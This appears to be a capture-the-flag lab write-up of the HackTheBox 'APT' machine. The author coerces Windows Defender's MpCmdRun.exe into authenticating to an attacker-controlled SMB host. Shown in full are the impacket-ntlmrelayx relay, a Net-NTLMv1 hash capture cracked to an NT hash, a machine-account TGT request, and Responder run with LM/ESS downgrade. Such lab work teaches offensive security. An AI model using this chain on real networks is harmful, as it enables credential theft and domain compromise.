InfoSec LAB

APT_NTLM_Relay

Created: 8 min read

NTLM Relay

as discovered previously, the target system appeared to have configured the lmcompatibilitylevel registry value set to 2, resulting the use of the insecure ntlmv1 (or net-ntlmv1) protocol for network authentication. It is known to be obsolete and vulnerable for cracking. This was also picked up by PEAS

Here, I will attempt to leverage the Windows Defender to authenticate to an arbitrary SMB server that I control. The Windows Defender, by default, runs with the SYSTEM privileges. Much like Unix’s SUID binaries, the execution will be made with the security context of SYSTEM.

mpcmdrun.exe is a command line tool provided by the Windows Defender to interact with various AV solutions onboard, including the Defender itself. It supports remote file scanning with the -Scan flag

I will first need to locate the binary and check through the SMB configurations

MpCmdRun.exe

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls -Path C:\ -Include MpCmdRun.exe -Recurse -ErrorAction SilentlyContinue
 
 
    Directory: C:\Program Files\Windows Defender
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/4/2021   5:42 AM         377648 MpCmdRun.exe
 
 
    Directory: C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.14393.4283_none_3b5ff297b161c9de
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/4/2021   5:42 AM         377648 MpCmdRun.exe

The binary is present in 2 different location. I will go with the one in the C:\Program Files directory

SMB configuration

It is also as important to enumerate the target system’s SMB setup for both client and server configurations

Server Configuration

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, EnableSecuritySignature, RequireSecuritySignature
 
EnableSMB1Protocol EnableSMB2Protocol EnableSecuritySignature RequireSecuritySignature
------------------ ------------------ ----------------------- ------------------------
              True               True                    True                     True

Based on the provided PowerShell cmdlet output above (Get-SmbServerConfiguration), it appears that Both SMBv1 and SMBv2 are enabled and message signing is enabled and required. This, however, only applies for the server configuration (current system being a SMB server), meaning that this isn’t necessarily the case if the target system becomes a client to an external SMB server

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
    EnableAuthenticateUserSharing    REG_DWORD    0x0
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\system32\srvsvc.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1
    NullSessionPipes    REG_MULTI_SZ    srvsvc
    autodisconnect    REG_DWORD    0xf
    enableforcedlogoff    REG_DWORD    0x1
    enablesecuritysignature    REG_DWORD    0x1
    requiresecuritysignature    REG_DWORD    0x1
    restrictnullsessaccess    REG_DWORD    0x1
    AdjustedNullSessionPipes    REG_DWORD    0x3
    DisableCompression    REG_DWORD    0x1
    AutoShareServer    REG_DWORD    0x0
    NullSessionShares    REG_MULTI_SZ    backup
    Guid    REG_BINARY    C01465E6BE462A44BE312DA9D5256049
 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\FsctlAllowlist

The registry set for the SMB server configuration is located at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters As shown above, message signing is enabled and required

Client Configuration

for client specific smb configuration, i can use the get-smbclientconfiguration PowerShell cmdlet

*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> Get-SmbClientConfiguration | Select EnableInsecureGuestLogons, EnableSecuritySignature, RequireSecuritySignature
 
EnableInsecureGuestLogons EnableSecuritySignature RequireSecuritySignature
------------------------- ----------------------- ------------------------
                     True                    True                    False

As shown above, message signing is enabled but NOT required as client Additionally, anonymous access is enabled

*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> cmd /c reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
    AccountDomainId    REG_SZ    0 0 0 0 0 5 21 2702878673 795188819 444038987
    Domain    REG_SZ    WORKGROUP
    DomainId    REG_SZ
    EnablePlainTextPassword    REG_DWORD    0x0
    EnableSecuritySignature    REG_DWORD    0x1
    RequireSecuritySignature    REG_DWORD    0x0
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\wkssvc.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1

This can also be check through the registry. SMB message signing is enabled (EnableSecuritySignature is set to 0x1) but NOT required (RequireSecuritySignature is set to 0x0). This means that while message signing is allowed, it’s not mandatory.

Execution

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-ntlmrelayx -t apt.htb.local -ntlmchallenge 1122334455667788 -of ntlmrelayx --interactive
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

I can start an arbitrary SMB server with impacket-ntlmrelayx

  • -ntlmchallenge is for offline cracking and technically unnecessary as I plan on RELAYING the authentication
  • --interactive for an interactive SMB session

The command above will relay the authentication back to the host (apt.htb.local)

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.16.8\blahblah
Scan starting...

Using the binary, MpCmdRun.exe, I can attempt to scan an arbitrary file located in the arbitrary SMB server that I set up above. This will invoke the Defender to make an outbound connection to the arbitrary SMB server . The execution will be made as SYSTEM as the Defender runs with SYSTEM privileges.

There is the hit. Interestingly, it came from the IPv4 address. Additionally, impacket-ntlmrelayx immediately relayed the authentication right back to the target system via the IPv6 address. This is ONLY possible because the SMBv1 protocol was used without the message signing. (signing is NOT supported for SMBv1) It then opened up an interactive SMB client shell session on the 127.0.0.1:11000 socket

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ nc 127.0.0.1 11000
Type help for list of commands
#

The session was established using impacket-smbclient I can connect to that.

# shares
backup
IPC$
NETLOGON
SYSVOL

This would be the end of operation in the usual case where the C$ SMB share is available because this session is made with the SYSTEM credential (APT$) However, the target SMB server does not have the default C$ share Therefore, although the NTLM relay attack itself is a success, I would need to find other ways to compromise the system

Capture The Hash

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-ntlmrelayx -smb2support -ntlmchallenge 1122334455667788 -of ntlmrelayx 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Running in reflection mode
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

I can start an arbitrary SMB server again with the -smb2support flag this time to enable the SMBv2 protocol This would likely invoke the target SMB server to use the message signing as it’s ENFORED, which means NO RELAY attack However, I can still grab the Net-NTLMv1 Authentication hash. The -of flag does exactly that.

*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.16.8\blahblah

Same thing.

There is the hit impacket-ntlmrelayx, by default, tries to relay the authentication back to the sender (10.10.10.213), but this will fail for 2 reasons

  • firewall rule doesn’t allow inbound connection to 10.10.10.213:445
  • Message signing is ENFORED, so it will fail regardless of the firewall status

Nonetheless, it must have collected the logged the Net-NTLMv1 authentication string made from the target system. It must be available as the ntlmrelayx_ntlm file as noted from the -of flag

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ cat ntlmrelayx_ntlm
apt$::HTB:b8d1e66de359095d00000000000000000000000000000000:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4:1122334455667788

There is the Net-NTLMv1 authentication string. hashcat was unable to crack this with known wordlists. So I will opt out to use an external resource

Password Cracking

There is an online tool that provides a very detailed breakdown of an given authentication token

Additionally, Net-NTLMv1 hash can be cracked via crack.sh for free This service is the best when it comes to cracking the Net-NTLMv1 hash at free of charge

There is a submission section that outlines the formatting. I will follow through and clean up the hash string

APT$::HTB:b8d1e66de359095d00000000000000000000000000000000:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4:1122334455667788 From this

NTHASH:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4 To this

Crack.sh has successfully completed its attack against your NETNTLM handshake. The NT hash for the handshake is included below, and can be plugged back into the ‘chapcrack’ tool to decrypt a packet capture, or to authenticate to the server: Token: 1122334455667788$14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4 Key: d167c3238864b12f5f82feae86a7f798 This run took 32 seconds. Thank you for using crack.sh, this concludes your job.

A moment after sending out a submission, I received an email with the cracked NT hash of the APT$ account; d167c3238864b12f5f82feae86a7f798

Validation
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-gettgt 'htb.local/apt$@apt.htb.local' -no-pass -hashes :d167c3238864b12f5f82feae86a7f798 -dc-ip $IPv6
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in APT$@apt.htb.local.ccache

Validated TGT generated for the machine account, APT$

now that i have compromised the machine account for the dc host, i can just dump the entire domain hashes with the dcsync attack

Hash Capturing with Responder

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ sudo responder -I tun0 --disable-ess --lm  -v
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 
  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder
 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
 
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
 
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
 
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
 
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [ON]
    Force ESS downgrade        [ON]
 
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.8]
    Responder IPv6             [dead:beef:4::1006]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP']
 
[+] Current Session Variables:
    Responder Machine Name     [WIN-L7UD3FJ0RA4]
    Responder Domain Name      [1ZJI.LOCAL]
    Responder DCE-RPC Port     [47841]
 
[+] Listening for events...

Responder can also be used for capturing hashes In fact, it’s much easier and it also supports force-downgrading ESS and LM hashing (--disable-ess/--lm), which makes it easier to crack

APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788 There it is.

ESS/SSP is DISABLED

Interactive Graph View

Backlinks